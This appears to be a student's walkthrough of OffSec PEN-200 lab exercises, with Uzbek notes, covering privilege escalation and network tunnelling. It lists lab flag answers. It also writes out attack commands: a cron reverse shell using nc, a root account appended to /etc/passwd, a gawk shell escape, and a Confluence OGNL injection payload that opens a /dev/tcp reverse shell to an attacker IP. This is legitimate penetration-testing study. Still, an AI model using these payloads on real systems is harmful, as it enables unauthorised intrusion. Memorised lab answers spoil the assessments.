Windows Privilege Escalation - Using Exploits - VM #2
Windows Privilege Escalation - VM #3
Labs
1. Follow the steps from this section on
CLIENTWK220 (VM #1). Use the CVE-2023-29360 exploit located on the Desktop of the steve user to elevate your
privileges to NT AUTHORITY\SYSTEM and find the flag on the desktop of daveadmin.
Answer
OS{2fe06e42bb244b955f4bc8aa6c67d4b1}
View hints
HINT
OSCP PEN-200 194
Follow the steps in this learning unit.
Command
windows 11 ning shu versiyasida zaiflik bor ekan
OSCP PEN-200 195
2. Follow the steps from this section on CLIENTWK220 (VM #2). Use SigmaPotato
to obtain code execution, an interactive shell, or access to the GUI as
administrative user and find the flag on the desktop of
daveadmin.
Answer
OS{374c302d52d68f68a7c31e5604206b5e}
View hints
HINT
Follow the steps in this learning unit.
Command
bu taskni SigmaPotato tool yordamida qilishim kerak edi, lekin dave userida SeImpersonatePrivilege ochiq ekanligi
uchun tayyor CVE turganidan foydalanib nt auth./system useriga escalate qilib flagni topdim (SigmaPotato tooli
SeImpersonatePrivilege hquqi yoqiq bo’lgan userlarda qo’llasa bo’ladi )
OSCP PEN-200 196
3. Capstone Lab: Get access to CLIENTWK222
(VM #3) by connecting to the bind shell on port 4444. Use the methods
covered in this Module to elevate your privileges to an administrative
user. Enter the flag, which is located in
C:\Users\enterpriseadmin\Desktop\flag.txt.
Answer
OS{7ae5b3cefee976cbac3ce6b508854147}
View hints
no hints
Command
bu yerda userning privilege larini ko’rib oldim bizga kerakli bo’lgan SeImpersonatePrivilege hquqi yo’g’akan
va userimizning home dir ga kirib oldim
OSCP PEN-200 197
bu yerda OS haqida ma’lumot oldim
va tavakkal CVE ni ozimni hostimdan upload qildim, va CVE ishlatsam nt auth./system userini oldim, va flagni qolga kiritdim
17. Linux Privilege Escalation
17.1.2. Manual Enumeration
Linux Privilege Escalation - Manual Enumeration - VM #1
Linux Privilege Escalation - Manual Enumeration - VM #2
Labs
1. Connect to VM 1 with the provided credentials and replicate the manual enumeration techniques covered in this
section. Inspect the target's OS information and its release details.
What is the Linux distribution codename?
Answer
buster
View hints
HINT
Use command provided in listing 5 to retrieve the VERSION_CODENAME of the Linux distribution.
Command
2. What crontab parameter is needed to list every cron job for the current user?
Answer
-l
OSCP PEN-200 198
View hints
HINT
Refer to the command shown in listing 12 to identify the parameter required for displaying all the cronjobs for the
current user
Command
3. What is the inherited UID called that allows a given
binary to be executed with root permissions even when launched by a lower-privileged
user?
Answer
eUID
View hints
HINT
1. Understand the roles of UID/GID in executing a binary.
2. Identify what the inherited UID is referred to when using SUID.
3. The answer is a four-letter acronym relating to effective user identity.
Command
4. Connect to VM 2 with the provided credentials. The flag is inside one of the SUID binaries available on the system.
Answer
OS{698276246914c02e5933a41eee3bd2cd}
OSCP PEN-200 199
View hints
HINT
1. Use the command provided in listing 20 to identify SUID files on the system.
2. If you discover an unusual SUID binary, you can try running the 'strings' command on it to extract any readable
text or strings.
Command
shu command orqali SUID flagi bor file larni topdik, va bizda passwd_flag bor ekan
17.1.3. Automated Enumeration
Linux Privilege Escalation - Automated Enumeration - VM #1
Labs
1. Connect to VM 1 with the provided credentials and run
unix-privesc-check in standard mode.
The flag is inside a file that normally should not be world-writable.
Answer
OS{06b3650ededbb02dc52ba68d5d90e8e4}
View hints
HINT
1. Run the 'unix-privesc-check' tool in standard mode to find world-writable files on a Unix system.
2. Once you find a world-writable file, read the file with the ""cat"" command in order to find the flag.
Command
https://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz
shu URL dan toolni o’zimizga yuklab olib python http web server yoqamiz
OSCP PEN-200 200
ozimizni hostdan target hostga shu toolni yuklab olib tardan decompress qilamiz
va shu tooldan standard optionidan foydalanib ishlatamiz outputini file yonaltiramiz
TXT filemizni ichidan critical bo’lgan qatorni topamiz, va bizda 2 ta output bor
2-sida bizni flagimiz mavjud
OSCP PEN-200 201
17.2.1. Inspecting User Trails
Linux Privilege Escalation - Inspecting User Tails - VM #1
Linux Privilege Escalation - Inspecting User Tails - VM #2
Labs
1. Connect to the VM 1 and repeat the steps learned in this section.
Which command is used to list
sudoer capabilities for a given user?
Answer
sudo -l
View hints
HINT
Use the command provided in listing 31 to learn how to list the sudoer capabilities for a particular user.
Command
no commands
2. Connect to the VM 2 machine with the provided credentials and try
to get the flag that resides under another user's file.
Answer
OS{861410c43ac1d05a1afe39908fe300e7}
View hints
HINT
1. Connect VM #2 with SSH using the provided credentials.
2. Identify the cron jobs running using the command provided in listing 35.
3. Once you've identified a suitable cron job, modify it with a reverse shell payload as shown in listing 37.
Command
OSCP PEN-200 202
17.2.2. Inspecting Service Footprints
Linux Privilege Escalation - Inspecting Service Footprints - VM #1
Linux Privilege Escalation - Inspecting Service Footprints - VM #2
Labs
1. Connect to VM 1 and repeat the steps discussed in this section.
Which utility is used to constantly inspect the output of the
ps command?
Answer
watch
View hints
HINT
Check out listing 33 to see an example of how to continuously monitor the output of the 'ps' command for changes.
Command
no commands
2. Connect to VM 2 as the joe user and retrieve the flag using one
of the methods explained in this section.
Answer
OS{9a3bc338ac5f764953fe6148400b9a47}
View hints
HINT
1. Look at the list of running processes on the system.
2. Use the provided command in listing 6 - "Manual Enumeration" on how to use the 'ps' command to display the
running processes and their associated details.
Command
OSCP PEN-200 203
17.3.1. Abusing Cron Jobs
Linux Privilege Escalation - Abusing Cron Jobs - VM #1
Linux Privilege Escalation - Abusing Cron Jobs - VM #2
Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which log file holds
information about cron job activities? Include the full path in the answer.
Answer
/var/log/syslog
View hints
HINT
Examine listing 35 to find out which log file contains information about cron job activities.
Command
2. Connect to VM 2 and look for another misconfigured cron job. Once found, exploit it and obtain a root shell in order to
get a flag.
Answer
OS{9cd5866b2f5efb558df378e082539019}
View hints
HINT
1. Connect VM #2 with SSH using the provided credentials.
2. Identify the cron jobs running using the command provided in listing 35.
OSCP PEN-200 204
3. Once you've identified a suitable cron job, modify it with a reverse shell payload as shown in listing 37.
Command
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f" >> <CRONJOB>.sh
17.3.2. Abusing Password Authentication
Linux Privilege Escalation - Abusing Password Authentication - VM #1
Linux Privilege Escalation - Abusing Password Authentication - VM #2
Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which hashing
algorithm has been used to encrypt the attacker's password?
OSCP PEN-200 205
Answer
crypt
View hints
HINT
To identify the hashing algorithm used for the attacker's password, refer to footnote #2 in this learning unit.
Command
2. Connect to VM 2 and get the flag by elevating to a root shell through password authentication abuse.
Answer
OS{188ef1092e2abc8683299b36712ecdb4}
View hints
HINT
Use the commands provided in the listing 39.
Command
17.4.1. Abusing Setuid Binaries and Capabilities
OSCP PEN-200 206
Linux Privilege Escalation - Abusing Setuid Binaries and Capabilities - VM #1
Linux Privilege Escalation - Abusing Setuid Binaries and Capabilities - VM #2
Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which utility can we use
to manually search for misconfigured capabilities?
Answer
getcap
View hints
HINT
1. Connect VM 1 with SSH using the provided credentials.
2. To discover the utility used for manual searching of misconfigured capabilities, use the command provided in
listing 46.
3. Only submit the command name not the full path as an answer.
Command
2. Connect to VM 2 and gain a root shell by abusing capabilities.
Answer
OS{2400406987fc1be328d3296620505070}
View hints
no hints
Command
OSCP PEN-200 207
OSCP PEN-200 208
OSCP PEN-200 209
17.4.2. Abusing Sudo
Linux Privilege Escalation - Abusing Sudo - VM #1
Linux Privilege Escalation - Abusing Sudo - VM #2
Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. Which kernel modules
enforce MAC policies to further protect the system?
Answer
AppArmor
View hints
HINT
Review the command output provided in listing 48 and listing 54 in this learning unit. Additionally, check the
footnote #5.
Command
2. Connect to VM 2 and gain a root shell by abusing a sudo misconfiguration.
Answer
OS{b095e10c79783099cc7870e3172792a8}
View hints
HINT
1. Use the provided command in listing 48 to determine which commands can be executed with sudo privileges.
2. Check GTFOBins (https://gtfobins.github.io/) for instructions on exploiting the sudo permissions to escalate
privileges to root.
Command
OSCP PEN-200 210
17.4.3. Exploiting Kernel Vulnerabilities
Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #1
Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #2
Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #3
Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #4
Linux Privilege Escalation - Exploiting Kernel Vulnerabilities - VM #5
Labs
1. Connect to VM 1 and repeat the steps discussed in this section in order to obtain a root shell. What is the name of the
compiler used to generate the exploit's executable file?
Answer
gcc
View hints
HINT
OSCP PEN-200 211
Review the command provided in listing 61 to determine the name of the
compiler utilized to generate the exploit executable file.
Command
2. Capstone Lab: Connect to VM 2 with the provided credentials and gain a root shell by abusing a different kernel
vulnerability.
Answer
OS{5d40405d835e901ae6997314852b44e0}
View hints
HINT
1. Enumerate the version of the system (Command shown in Listing 5).
2. Check SUID binaries (Command shown in Listing 20) and their versions.
3. Search for vulnerable exploits based on the discovered versions.
4. Flag is located in the /root/flag.txt.
Command
https://github.com/ly4k/PwnKit/blob/main/PwnKit.sh
1.sh filega bash scriptimizani copy qilamiz va ishlatamiz, flagni topamz
3. Capstone Lab: Connect to the VM 3 with the provided credentials and use an appropriate privilege escalation
technique to gain a root shell and read the flag.
Answer
OS{707b50696bb39862dde492904d3efddf}
OSCP PEN-200 212
View hints
HINT
1. Start by enumerating cronjobs using the techniques taught in Manual Enumeration - Listings 11 and 12.
2. Once you have identified a suitable cronjob proceed to exploit it
using the techniques taught in Abusing Cron Jobs learning unit.
Command
bizda archiver job vor ekan
OSCP PEN-200 213
shu archiver job ni ichidagini o’qiymiz va archive.sh ga SUID flagni beruvchi “chmod u+s /bin/bash” commandini amalga oshiramiz,
azgina vaqtdan keyin /bin/bashga s flagi qo’shiladi, va /bin/bash -p commandi orqali root huquqiga ega bo’lishimiz mumkin
OSCP PEN-200 214
4. Capstone Lab: On the Module Exercise VM 4, use another appropriate privilege escalation technique to gain access
to root and read the flag. Take a closer look at file permissions.
Answer
OS{74a1ccae5c8109649246d7b5d0b05030}
View hints
HINT
1. Begin by enumerating all world-writable files on the system using the technique in Manual Enumeration - listing
15.
2. Use the techniques taught in Abusing Password Authentication to
abuse the write permissions on these files and escalate privileges.
Command
OSCP PEN-200 215
find / -writable -type f 2>/dev/null | tail
openssl passwd <password>
echo "root2:<Openssl encrypted password>:0:0:/root:/bin/bash" >> /etc/passwd
su root2
5. Capstone Lab: Again, use an appropriate privilege escalation technique to gain access to root and read the flag on
the Module Exercise VM 5. Binary flags and custom shell are what to look for.
Answer
OS{4e3a7159acfaa293811bfc0c0581730a}
View hints
HINT
1. Begin by listing the SUID binaries, using the commands provided in Manual Enumeration - listing 20.
2. Exploit the SUID binaries using
GTFOBins.
Command
OSCP PEN-200 216
find / -perm -4000 2>/dev/null
va u yerdan gawk dasturi uchun priv. esc. uchun commandni https://gtfobins.github.io/gtfobins/gawk/ dan topamz
OSCP PEN-200 217
/usr/bin/gawk 'BEGIN {system("/bin/sh")}'
18. Port Redirection and SSH Tunneling
18.2.3. Port Forwarding with Socat
Port Redirection and SSH Tunneling - Port Forwarding with Socat - VM Group
Labs
1. Follow the steps in this section to set up a port forward and gain access to the
confluence database on PGDATABASE01 using psql from your Kali machine. Crack the password of the
database_admin user. What is the plain text password of this account?
Answer
sqlpass123
View hints
HINT
Repeat the steps in this learning unit. If you want to double-check the passwords that you've cracked, you may
refer to listing 13.
Command
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
OSCP PEN-200 218
/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()")}/
curl http://192.168.125.63:8090/%24{new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash'%2C'-c'%2C'bash -i >%26
/dev/tcp/192.168.45.183/4444 0>%261').start()")}/
OSCP PEN-200 219
ip address larni, routelarni check qilib confluence.cfg.xml fileni ochib Postgressql ni credential va ichki tarmoqdagi ip va portlarini
ko’ramiz
OSCP PEN-200 220
socat tooli orqali shu hostimizga 2345 portiga keladiga trafikni postgressning ip:portiga redirection qilamiz
postgressga ulanish uchun listen qivotgan hostni ipsini va portini yozib ulansak bizni trafik ichki tarmoqdagi posgressning ip:portiga
borib ulanadi, va \l orqali list qilib olib, hamma db dan userlar haqida malumotlarni ko’ramiz
userlar malumotalirni ichidan database_admin ning heshlangan credentialini olib
file ichiga yozib olamiz
OSCP PEN-200 221
shu command orqali heshlangan parolni topamiz
OSCP PEN-200 222
2. Capstone Lab: Use the password found in the previous question to create a new port forward on CONFLUENCE01
and gain SSH access to PGDATABASE01 as the database_admin user. What's the value of the flag found in
/tmp/socat_flag on PGDATABASE01?
Answer
OS{69b5b616d69ef384dd0daed09f47a82a}
View hints
HINT
1. Use and update the command in listing 10 for connecting to PGDATABASE01's port 22.
2. Confirm proper port forwarding by scanning CONFLUENCE01's open ports with Nmap.
3. SSH into PGDATABASE01 as 'database_admin' via the forwarded port on CONFLUENCE01.
Command
nc bn listen qilib
boyagi POC payloadni ishlatib reverse shell olamiz
reverse shell olganimizdan keyin postgress ishlayotgan hosstga 2222 portdan keladigan trafikni IP:22 ga readirection qilamiz
OSCP PEN-200 223
va ozimizdan ssh ga ulanayotganimizda 1chi hostni 2222 portiga bog’lanib useri esa 2chi hostni userini yozib bog’lansak bizni trafik 2
chi hostni 22 portiga redirection bo’lib ssh portiga bog’lanamiz, va /tmp ichidan flagni topamiz
18.3.1. SSH Local Port Forwarding
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_local_client
200/extras/prat2/1e4c3abaa24721e69c1359811673c91f-ssh_local_client
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_local_client_aarch64
200/extras/prat2/3517f72efa170f849974e84a250497d6-ssh_local_client_aarch64
Port Redirection and SSH Tunneling - SSH Local Port Forwarding - VM Group 1
Port Redirection and SSH Tunneling - SSH Local Port Forwarding - VM Group 2
Labs
1. Start VM Group 1 and follow the steps in this exercise. What's the flag in
Provisioning.ps1?
Answer
OS{8db4999a606f74a8bf6ebc1b644a9e10}
View hints
no hints
Command
nc da listen qilamiz
va boyagi POC payload orqali reverse shell olamiz
OSCP PEN-200 224
bizda reverse shell bor, keyin database_admin ga ssh orqali ulanib undagi ip va routelarini ko’ramiz, va u yerdan ichki tarmoqda yana bir
ichki tarmoqni aniqlab for loop operatori orqali 445 portda host up deviceni tekshiramiz
OSCP PEN-200 225
host up device aniqlaganimizdan keyin ssh tunnel yaratamiz bunda 0.0.0.0:4455 listen qiluvchi socket bo’lib keyin 2chini ichidagi host
172****:445 portga redirection qiluvchi ip va port hisoblanadi va oxiridagi database_admin bu 2 chi hostdagi user va ipsi hisoblanadi,
enter bosganimizda tunnel ochilgan holda qoladi
ssh : This is the command to initiate an SSH connection.
N : This option tells SSH not to execute a remote command.
L : This option specifies the local port forwarding.
0.0.0.0:4455 : This means that the SSH tunnel will listen on all interfaces on port 4455.
172.16.125.217:4455 : This is the target server (HRSHARES) and port you want to forward traffic to.
[email protected] : This is the user and IP address of the CONFLUENCE01 machine.
OSCP PEN-200 226
harqatan tunnel ochilganini ko’rish uchun yana bir portdan listen qilib
POC payloadini yuklab reverse shell olamiz
reverse shell olib bolib ss commandi orqali check qilamiz tunnelimizi, va u bor !
boshqa terminaldan smbclient orqali boyagi listen qivotgan portni 4455 ga va listen qivotgan 1chi hostimizni ipsini yozib -L orqali list
qilamiz qanday Directorylar share bo’lib turganini ko’rish uchun -U hr_admin userini passwordi ni database dan olib hashcatda crack
qilinganda chiqadi, va bizda scripts directorysi bor ekan
OSCP PEN-200 227
shu directory ichiga kiramiz user pass orqali, ls orqali list qilib ps1 file borligini ko’ramiz va get commandi orqali o’zimizga yuklab olamiz
va flagni topamiz
2.Start VM Group 2. A server is running on HRSHARES port 4242.
Download the
ssh_local_client binary from the Resources
section. If you're using the
aarch64 build of Kali, download the
ssh_local_client_aarch64 binary. Create an SSH local port forward
on CONFLUENCE01, which will let you run the binary from your Kali
machine against the server on HRSHARES and retrieve the flag.
Note: the source files used to build the ssh_local_client and
ssh_local_client_aarch64 binaries can be downloaded from
OSCP PEN-200 228
/exercises/client_source.zip on CONFLUENCE01.
Answer
OS{15d57367f4402fc74c92368b9238ad39}
View hints
HINT
1. Enable Python's pty module after getting a shell on Confluence.
2. Set up port forwarding as in listing 20, changing the port to 4242 and IP.
3. Download ssh_local_client via browser.
4. Use the -h argument for help if issues arise with the binary.
Command
nc bn listen qildik
POC payloadini yuklab reverse shell oldik
reverse shell olib bo’lib python orqali PTY shell ni yukladik, ip larni check qldik, ssh tunnel yaratdik socketiga 4242 portini berib
172****:4242 portiga redirection qilib database_admin useri orqali 10**** ipsi orqali trafikimizani yuborishga
va tunnelimiz harqatan yaralganini bilish uchun nmapdan foydalandik
OSCP PEN-200 229
resources dan ssh local client fileni yuklab oldik
unga executable flagni berib uni 1-hostimizni ipsiga listen qivotgan 4242 portini berib ishlatdik, va flag chiqdi
18.3.2. SSH Dynamic Port Forwarding
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_dynamic_client
200/extras/prat2/218cf66c8276ce6b350b6174e2cf70b1-ssh_dynamic_client
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_dynamic_client_aarch64
200/extras/prat2/23988ed48288d3a3f8118fe1e6495483-ssh_dynamic_client_aarch64
Port Redirection and SSH Tunneling - SSH Dynamic Port Forwarding - VM Group
Labs
1. Follow this walkthrough, and scan HRSHARES from the Kali machine
using Nmap and Proxychains. What port between 4800 and 4900 is open?
Answer
4872
View hints
HINT
Repeat the steps in this learning unit. Review the command used in
listing 27, making sure to scan desired port range using "-p4800-4900".
Command
listen qildik
POC payload yukladik
OSCP PEN-200 230
reverse shell ochildi, interactive shell yukladm python orqali, ssh tunneling yaratdik 2-host orqali
proxychainsga socks5 ip va portini yozdim
shu commandni ishlatdm, nimaga 4870-4875 gacha chunki javobini discorddan topdim
2.Download the client binary ssh_dynamic_client from the
Resources section. If you're using the aarch64 build of Kali,
download the
ssh_dynamic_client_aarch64 binary. Using
Proxychains, run the binary from your Kali machine against the port
you just found.
Note: the source files used to build the ssh_dynamic_client and
ssh_dynamic_client_aarch64 binaries can be downloaded from
/exercises/client_source.zip on CONFLUENCE01.
Answer
OS{97f2b21377e1ec5fa8cff9dca5c372c9}
View hints
HINT
OSCP PEN-200 231
1. Repeat the steps in this learning unit to set the dynamic port forward.
2. Download the ssh_dynamic_client via browser.
3. Make the binary executable and run via proxychains on the open HRSHARES port found in the previous exercise
to get the flag.
Command
9999 portni listen qilgan holatda, proxychainsda davom etdim
fileni yuklab oldim
shu hintga asosan
proxychains dan foydalanb oldingi LAB dan topilgan portni va 3 chi hostni IP sini yozib ishlatdm, va flag chiqdi
18.3.3. SSH Remote Port Forwarding
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_remote_client
200/extras/prat2/2e345e06246bd4465204327a6d6892a5-ssh_remote_client
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_remote_client_aarch64
200/extras/prat2/dfdadb5afb5a697c6cf8fd8568835443-ssh_remote_client_aarch64
Port Redirection and SSH Tunneling - SSH Remote Port Forwarding - VM Group 1
Port Redirection and SSH Tunneling - SSH Remote Port Forwarding - VM Group 2
Labs
1. Start VM Group 1 and follow the example from this section. What's
the value of the flag found in the
hr_backup database payroll
table?
OSCP PEN-200 232
Answer
OS{b09963563a0773d3d955a876c0551a2c}
View hints
HINT
1. Configure the remote port forward as instructed in this unit.
2. Upon gaining access to the PostgreSQL database (listing 32), connect using "\c hr_backup."
3. Fetch all entries from the database with "SELECT * FROM payroll;" to access the flag.
Command
listening qilamiz
POC payloadini yuklaymiz
ssh serviceni yoqamiz
ssh yonganini tekshiramiz
python orqali interactive shell yuklyamiz
ssh ning -R orqali REMOTE tunnel yaratamiz
va u yaraldi
OSCP PEN-200 233
ozimzning devicemizdan postgressql ga kiramiz va targetimizdagi 2 chi hostni database bizga tunnel bo’ldi va u yerdan hr_backup
useridan flagni topamiz
2.Start VM Group 2. Download the ssh_remote_client binary from
the
Resources section. If you're running the aarch64 build of
Kali, download the
ssh_remote_client_aarch64 binary. Create an
SSH remote port forward on CONFLUENCE01 that allows you to run the
binary against port 4444 on PGDATABASE01 from your Kali machine.
Note: the source files used to build the ssh_remote_client and
ssh_remote_client_aarch64 binaries can be downloaded from
/exercises/client_source.zip on CONFLUENCE01.
Answer
OS{6622ff47c1352ac179f7cc7e0a7b2dec}
View hints
HINT
1. Configure the remote port forward as instructed in this learning unit.
2. Refer to listing 30, modify the port to 4444, and adjust the IP address.
3. Download the ssh_remote_client via browser.
Command
OSCP PEN-200 234
listening qilamiz
payload yuklaymiz
REMOTE tunnel yaratamiz
tunnelimiz ishlayotganini check qilamiz
va boyagi binary file orqali flagni topamiz
18.3.4. SSH Remote Dynamic Port Forwarding
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_remote_dynamic_client
200/extras/prat2/ffeb2f612236b516f854380ff9b73ee2-ssh_remote_dynamic_client
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
ssh_remote_dynamic_client_aarch64
200/extras/prat2/0bf514c2878bd2de5beff60f580fdf0c-ssh_remote_dynamic_client_aarch64
Port Redirection and SSH Tunneling - SSH Remote Dynamic Port Forwarding - VM Group
Labs
1. Follow the steps in this section to set up a remote dynamic port forward from CONFLUENCE01. Scan ports 9000-9100
OSCP PEN-200 235
on MULTISERVER03 through it. Which port is open? (Note: Make sure to scan MULTISERVER03 on its internal interface
at 10.4.X.64).
Answer
9062
View hints
HINT
Repeat the steps in this learning unit. In the last step, you can conduct a port scan on host 10.4.X.64 (make sure to
adjust the third subnet accordingly) on ports 9000-9100 using either netcat or Nmap.
Command
listening qildik
POC payload yukladik
reverse shell olib REMOTE DYNAMIC portni ochdik
check qildik
proxychains conf ga tunnel ochgan localhost va portimizni kiritamiz
OSCP PEN-200 236
nc orqali ochiq portni tekshirishda ochiq portni topdik
2.Capstone Lab: Download the ssh_remote_dynamic_client binary from the Resources section. If you're running the
aarch64 build of Kali, download the ssh_remote_dynamic_client_aarch64 binary. Run the binary against the port you
just found on MULTISERVER03 through the remote dynamic port forward.
Note: the source files used to build the ssh_remote_dynamic_client and ssh_remote_dynamic_client_aarch64 binaries
can be downloaded from /exercises/client_source.zip on CONFLUENCE01.
Answer
OS{6a709205af4a60fa3b1dbf222c135c66}
View hints
HINT
1. Configure the remote dynamic port forward as shown in this learning unit.
2. Download the ssh_remote_dynamic_client via browser.
3. Make the binary executable, and run via proxychains on the port discovered in the previous exercise to reveal the
flag.
Command
1 labdagi hamma ishdan keyin davom etamiz
OSCP PEN-200 237
18.3.5. Using sshuttle
Port Redirection and SSH Tunneling - Using sshuttle - VM Group
Labs
1. True or false: in order to run sshuttle, you need root privileges
on the SSH client machine.
Answer
true
View hints
no hints
Command
18.4.1. ssh.exe
ssh_exe_exercise_client
ssh_exe_exercise_client_aarch64
Port Redirection and SSH Tunneling - ssh.exe - VM Group
Labs
1. Log in to MULTISERVER03 with the
rdp_admin credentials we found in the Confluence database (rdp_admin:P@ssw0rd!). Enumerate which port
forwarding techniques are available, then use the Windows OpenSSH client to create a port forward that allows you to
OSCP PEN-200 238
reach port 4141 on PGDATABASE01 from your Kali machine.
Download the
ssh_exe_exercise_client binary from the Resources section to your Kali machine. If you are running the aarch64 build
of Kali, download the ssh_exe_exercise_client_aarch64 binary. Run he binary from your Kali machine against port 4141
on PGDATABASE01, through the port forward you create. Once a successful connection is made, the client will print the
flag it gets from the server.
Note: the source files used to build the
ssh_exe_exercise_client
and
ssh_exe_exercise_client_aarch64 binaries can be downloaded
from
/umbraco/client_source.zip.
Answer
OS{ed0345ccf0c4f77054d2ef052ad49ffc}
View hints
HINT
1. Configure the port forward as shown in this learning unit.
2. Download the ssh_exe_exercise_client.bin via browser.
3. Make the binary executable and run it through proxychains against 4141 on PGDATABASE01 to reveal the flag.
Command
rdp orqali hostga ulandik
target hostimizda ssh tunnel yaratdik
yaralgan tunnel check qldik
offsec bergan fileni download qlb, unga executable qldik
OSCP PEN-200 239
proxychains conf ni portini o’zgartirdik
proxychainsdan foydalanib executable fileni ishlatgan holatda flagni oldik
18.4.2. Plink
Port Redirection and SSH Tunneling - Plink - MULTISERVER03
Labs
1. Follow the steps in this section to gain an RDP connection
to MULTISERVER03. What's the flag found in
flag.txt file on the
rdp_admin's desktop?
Answer
OS{bf681edd312479acc271c2bebf42a96a}
View hints
HINT
Repeat the steps in this learning unit. If you encounter any issues with Plink, you can use the most current version
from this link.
Command
shunga asosan
OSCP PEN-200 240
hostimizga kirdik webshellni topdik
o’zimizda apache ni ishga tushirdik
va hostimizdan yuklab olish uchun nc.exe qidirb topib uni copy qildik
webshelldan shu codeni execute qildik bizdan nc.exe ni yuklab oldi
ozimizda nc orqali listen qildik
webshellda nc exeni ishlatdik bizga reverse shell ochilishi uchun
va bizda reverse shell bor
OSCP PEN-200 241
va ozimizdan plink.exe ni hostmzga copy qldik
olgan reverse shellimiz orqali plink exeni yuklab oldik
check qildik
OSCP PEN-200 242
plink exe orqali ssh dan ozimizga tunnel yaratdik, va bizni sshga kirdi
yaratgan tunnelimizni check qildik
boshqa terminaldan tunnel bolgan line orqali rdp ga bog’landik
OSCP PEN-200 243
va desktopdan flagni topdik
18.4.3. Netsh
netsh_exercise_client
netsh_exercise_client_aarch64
Port Redirection and SSH Tunneling - Netsh - VM Group 1
Port Redirection and SSH Tunneling - Netsh - VM Group 2
Labs
1. Start VM Group 1. As in the walkthrough, RDP into MULTISERVER03 and create a port
forward with Netsh, in order to SSH into PGDATABASE01 from the Kali machine. Retrieve the flag on PGDATABASE01 at
/tmp/netsh_flag.
Answer
OS{bae4786775f317df94bb59b75313989d}
View hints
no hints
Command
rdp orqali ulanamiz
OSCP PEN-200 244
port forwarding qilamiz, va check qilamiz
scan qilamiz, va bizdagi 222 portdagi xolati filtered
va firewallga rule qo’shamiz
nmapda check qilamiz, va 222 portdagi holati ochiq
OSCP PEN-200 245
tunnel yaratgan hostimizga ssh orqali ulanishga harakat qilamiz, va bog’lanadi, flagni topamiz
2.Capstone Lab: Start VM Group 2. Download the netsh_exercise_client binary from the Resources section to your Kali
machine. If you're running the aarch64 build of Kali, download the netsh_exercise_client_aarch64 binary. Create a port
forward on MULTISERVER03 that allows you to run this binary against port 4545 on PGDATABASE01. The flag will be
returned when a successful connection is made.
Note: the source files used to build the netsh_exercise_client
and
netsh_exercise_client_aarch64 binaries can be downloaded from
/umbraco/client_source.zip on MULTISERVER03.
Answer
OS{c0852c19ee5e003c375737b210684445}
View hints
HINT
1. Repeat the steps in this learning unit.
2. Use the command in listing 60, and change the port to 4545 and the IP.
3. Download the netsh_exercise_client.bin.
4. Make the binary executable and run it against 4545 on MULTISERVER03 to get the flag.
Command
OSCP PEN-200 246
recources dan fileni yuklab olib, executable flagni beramiz
rdp orqali bog’lanamiz
4545 portga tunnel yaratamiz ichki tarmoqdagi hostga
nmap da holatini ko’tish uchun scan qilamiz , va u filtered holatda
firewallga rule qoshamiz
OSCP PEN-200 247
scan qilamiz, holati open
va boyagi binary filemiz orqali flagni olamiz
19. Tunneling Through Deep Packet Inspection
19.1.2. HTTP Tunneling with Chisel
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
chisel_exercise_client
200/extras/tunneling/8799b14ce6c4d8a29a2ec210de7cf7b0-chisel_exercise_client
https://offsec-platform-prod.s3.amazonaws.com/offsec-courses/PEN-
chisel_exercise_client_aarch64
200/extras/tunneling/202fe1c28d984bbab275d486949bc7ec-chisel_exercise_client_aarch64
Tunneling Through Deep Packet Inspection - HTTP Tunneling with Chisel - VM Group 1
Tunneling Through Deep Packet Inspection - HTTP Tunneling with Chisel - VM Group 2
Labs
1. Start VM Group 1. Follow the steps in this section, and set up Chisel as a reverse SOCKS proxy. SSH into
PGDATABASE01 and retrieve the flag from
/tmp/chisel_flag.
Answer
OS{598b9ca3728e3f9afbfc70f3a77a5879}
View hints
no hints
Command
https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_386.gz
manda chiselni yangi versiyasi ishlamagani uchun eski versiyasini yuklab oldim
OSCP PEN-200 248
eski versiondigi chiselni var/www/html copy qilamiz
apache2 ni ishga tushiramiz
shu commandni olib URL encode qilib POC payloadga joylashtrb yuklaymiz
POC payload yuklanganidan keyin
apacheni logidan bizdan olgani fileni check qilamiz
eski versiondigi chiselni serv qilamiz 8080 portda
va 8080 portagi traficni ko;rish uchun shu commandni ishga tushiramiz
OSCP PEN-200 249
shu commandni POC payloadga joylashtrb socks tunnel ochamz
bizga socks tunnel ochish uchun payloadni yuklaymiz
va tcpdumpda bizga tunnel ochilganini ko’rishimiz mumkin
chisel da esa localhostda 1080 portda listen qivotganini ko;rishimiz mumkin
OSCP PEN-200 250
va ssh orqali shu commandni terib ulanib flagnni topishimiz mumkin
2. Start VM Group 2. Download the chisel_exercise_client binary from the Resources section to yourKali machine. If
you're running the aarch64 build of Kali, download the chisel_exercise_client_aarch64 binary instead. There's a server
running on port 8008 on PGDATABASE01. Set up a port forward using Chisel that allows you to run the binary you
downloaded against port 8008 on PGDATABASE01.
Note: the source files used to build the client binaries can be downloaded from
/exercises/client_source.zip.
